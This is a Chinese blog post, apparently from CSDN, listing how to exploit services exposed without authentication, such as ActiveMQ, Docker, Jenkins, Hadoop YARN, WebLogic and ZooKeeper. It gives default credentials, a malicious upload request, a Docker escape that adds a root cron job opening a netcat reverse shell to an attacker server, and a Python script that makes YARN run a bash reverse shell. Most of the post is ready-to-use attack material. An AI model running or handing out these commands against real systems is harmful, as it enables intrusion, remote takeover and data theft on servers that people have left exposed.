WEB渗透-未授权访问篇

WEB渗透未授权访问篇-Redis-CSDN博客

activemq

默认端口8161,默认账户密码admin/admin http://1.1.1.1:8161/admin/connections.jsp

复制代码
PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
Content-Length: 27
Host: 1.1.1.1:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=
123123123123123123123123123

CouchDB

开源数据库,默认端口5984,SSL端口6984

复制代码
curl 192.168.1.10:5984
curl 192.168.1.10:5984/_config

Docker

默认端口237

复制代码
docker -H tcp://1.1.1.1:2375 images

本地监听 启动容器

复制代码
docker -H tcp://1.1.1.1:2375 run -id -v /etc/crontabs:/tmp alpine:latest
docker -H tcp://1.1.1.1:2375 ps

进入容器

复制代码
docker -H tcp://1.1.1.1:2375 exec -it a8ff7ed880fb sh

echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务
cat /tmp/root 
exit

Shipyard默认密码 admin/shipyard

Elastic

默认端口9200

复制代码
http://1.1.1.1:9200/_plugin/head/
http://1.1.1.1:9200/_nodes
http://1.1.1.1:9200/_river
http://1.1.1.1:9200/_plugin/sql/

jboss

复制代码
http://192.168.1.1:8080/jmx-console/ 无需认证进入
jboss.deployment部署shell
addURL()的paramValue写入远程war木马地址

Jenkins

复制代码
http://<target>:8080/manage
http://<target>:8080/script

执行系统命令

复制代码
println "whoami".execute().text

hadoop

复制代码
http://192.168.1.1:8088/cluster
本地监听端口 >> 创建Application >> 调用Submit Application API提交

poc

复制代码
#!/usr/bin/env python
import requests

target = 'http://192.168.18.129:8088/'
lhost = '192.168.18.138' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

memcache

复制代码
默认端口11211
>telnet 1.1.1.1 11211
>nc -vv 1.1.1.1 11211

mongo

复制代码
默认端口27017直接连接进行增删改查
连接工具
https://s3.mongobooster.com/download/releasesv5/nosqlbooster4mongo-5.1.12.exe

VNC

复制代码
默认端口 5900、5901

Solr

solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等

复制代码
http://xx/solr/admin
https://xx/solr/admin

Weblogic

J2EE应用服务器,默认端口7001 访问URL,直接打开后台页面

复制代码
http://192.168.1.10:7001/console/css/%252e%252e%252fconsole.portal

Zabbix

复制代码
服务器监控软件,默认端口10051
无需账户密码直接访问zabbix页面

zookeeper

默认端口2181 获得服务器环境信息

复制代码
>echo envi|nc 192.168.0.1 2181
连接
>./zkCli.sh -server ip:port
连接工具
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
相关推荐
crazyme_67 分钟前
前端自学入门:HTML 基础详解与学习路线指引
前端·学习·html
撸猫79115 分钟前
HttpSession 的运行原理
前端·后端·cookie·httpsession
亦世凡华、34 分钟前
Rollup入门与进阶:为现代Web应用构建超小的打包文件
前端·经验分享·rollup·配置项目·前端分享
Bl_a_ck1 小时前
【React】Craco 简介
开发语言·前端·react.js·typescript·前端框架
augenstern4162 小时前
webpack重构优化
前端·webpack·重构
mooyuan天天2 小时前
upload-labs通关笔记-第3关 文件上传之黑名单绕过
web安全·文件上传·文件上传漏洞·upload-labs靶场
海拥✘2 小时前
CodeBuddy终极测评:中国版Cursor的开发革命(含安装指南+HTML游戏实战)
前端·游戏·html
寧笙(Lycode)3 小时前
React系列——HOC高阶组件的封装与使用
前端·react.js·前端框架
asqq83 小时前
CSS 中的 ::before 和 ::after 伪元素
前端·css
拖孩3 小时前
【Nova UI】十五、打造组件库之滚动条组件(上):滚动条组件的起步与进阶
前端·javascript·css·vue.js·ui组件库